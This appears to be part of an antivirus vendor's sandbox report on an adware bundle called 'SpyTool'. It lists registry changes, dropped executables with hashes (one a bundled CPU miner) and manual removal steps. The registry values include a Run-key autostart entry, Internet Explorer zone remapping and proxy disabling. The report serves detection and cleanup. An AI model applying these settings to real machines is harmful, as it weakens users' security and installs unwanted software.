[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsr18.tmp:1388 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 37 10 41 23 A8 F2 36 B5 E4 65 07 39 26 91 CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"

The process nsr18.tmp:460 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\registry.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB D9 4A F0 50 51 09 45 AB C5 90 4F 84 B3 59 64"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsx27.tmp:1340 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F F3 AD 45 EF 40 02 11 55 96 3E CC A3 8E 26 4A"

The process nsx27.tmp:336 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Tutorials\updv]
"Version" = "15.09.24"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"HelpLink" = "http://re.gamesdesktop.com"
"Inno Setup: User" = "%CurrentUserName%"
"QuietUninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe /SILENT"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"InstallDate" = "20150925"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\gmsd_re_005010096\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLInfoAbout" = "http://re.gamesdesktop.com"

[HKCU\Software\TutoTag]
"OnceInstalled" = "re"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Publisher" = "GAMESDESKTOP"

[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft]
"Tinstalls" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Language" = "re"

[HKCU\Software\Microsoft\Tinstalls]
"20150925" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"DisplayName" = "GamesDesktop 092.005010096"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Icon Group" = "GAMESDESKTOP"

[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010096]
"PathInstall" = "%Program Files%\gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 32 AB F8 CD F8 EC 84 FC 22 D0 64 83 02 35 F8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoModify" = "1"
"Inno Setup: Setup Version" = "5.5.6 (a)"

[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"

The SpyTool deletes the following registry key(s):

[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]

The process encrypt.exe:1700 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 7D 9D B9 4D 8F EA 30 C9 CE C1 FC DE 74 0E 9B"

The process encrypt.exe:1364 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 15 B5 48 15 CA 7D A4 AD 44 2C 75 64 52 88 B2"

The process encrypt.exe:1564 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 87 5B 1D 77 67 56 E5 9D 8D FD B8 6B 93 95 00"

The process encrypt.exe:496 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA DB 0A BE AD B7 ED C6 D3 F7 DD 09 FF 91 71 8C"

The process %original file name%.exe:860 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 1C 77 55 34 FE BA A2 FB D1 9A 65 68 45 8C B9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsd41.tmp:816 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 70 1D BA 92 0B 65 B0 3C 6B 23 E8 3D D8 44 8C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsk6.tmp:496 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 9B 39 A8 5A CA 30 F0 7B 6A E4 0A 94 E2 A9 56"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-cpm-opw-crr"

The process nsqA.tmp:508 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 1A CD 5D 3A 8E 83 F8 03 9F 3C 23 1F 40 31 02"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
c8ce26b81e2160a03cee3fe0f4ad4463c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\5517\setup.exe
690f4b16c53bec409e4f465cfb4231a3c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\8819.exe
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc1C.tmp\registry.dll
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi1F.tmp\registry.dll
f02155fa3e59a8fc48a74a236b2bb42ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\inetc.dll
cf3c49ebab2b29f65fe80ec349072d99c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr18.tmp
5925c8698cc2f0f44edc9f5dd61fc7cdc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr21.tmp
fce81f5d5e6baabe8eb9f87a1bb3599cc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsrD.tmp
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss25.tmp\registry.dll
029aa26a0dd5ef7bd1ba1639703f8faec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe
5925c8698cc2f0f44edc9f5dd61fc7cdc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe
5c9336efb1faf577655bcd88a444c26bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe
cf3c49ebab2b29f65fe80ec349072d99c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe
690f4b16c53bec409e4f465cfb4231a3c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe
d4937ebdbcea35fc0f12233e57c30ca4c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe
c8ce26b81e2160a03cee3fe0f4ad4463c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe
c8ce26b81e2160a03cee3fe0f4ad4463c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe
e6b0bc04dca07169abfc4456c4671307c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll
0bcd0698977726a660321b4fec8f4a5ec:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll
6d64fd7d8a69a39ed4ddcf0cd8d26b4bc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll
72f70472e350b35290839f3e2802b4f4c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll
c81e0c917d5db4fecd2ec3c7e2712bbfc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll
634ec1dc874c89711b94b5c279987d66c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe
6e98034de60d2e96b4bbb148bbeabadbc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll
17baa5fcf3b9206cc0395a7cc38be7acc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll
2b8929f7edc2df8925066cb0e7067365c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll
a25f20a5664891bc292970bd23acbf21c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll
302f011627a16ce5555e39ec53d4fbddc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll
814cb49f7706f681723ea9b5746987e4c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe
90871478e7b9765cccb884751bfafc7bc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll
4120c792ee30c922d95c5201cedade29c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe
690f4b16c53bec409e4f465cfb4231a3c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    upgmsd_re_005010096.exe:1928
    gmsd_re_005010096.exe:740
    nsk15.tmp:1340
    nsj35.tmp:588
    8819.exe:368
    nssF.tmp:1488
    setup.exe:828
    taskkill.exe:1408
    taskkill.exe:248
    taskkill.exe:1092
    wmic.exe:1336
    amisid.exe:496
    amisid.exe:600
    tasklist.exe:1852
    tasklist.exe:492
    nsr18.tmp:1388
    nsr18.tmp:460
    nsx27.tmp:1340
    nsx27.tmp:336
    encrypt.exe:1700
    encrypt.exe:1364
    encrypt.exe:1564
    encrypt.exe:496
    %original file name%.exe:860
    nsd41.tmp:816
    nsk6.tmp:496
    nsqA.tmp:508

  2. Delete the original SpyTool file.
  3. Delete or disinfect the following files created/modified by the SpyTool:

    %Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
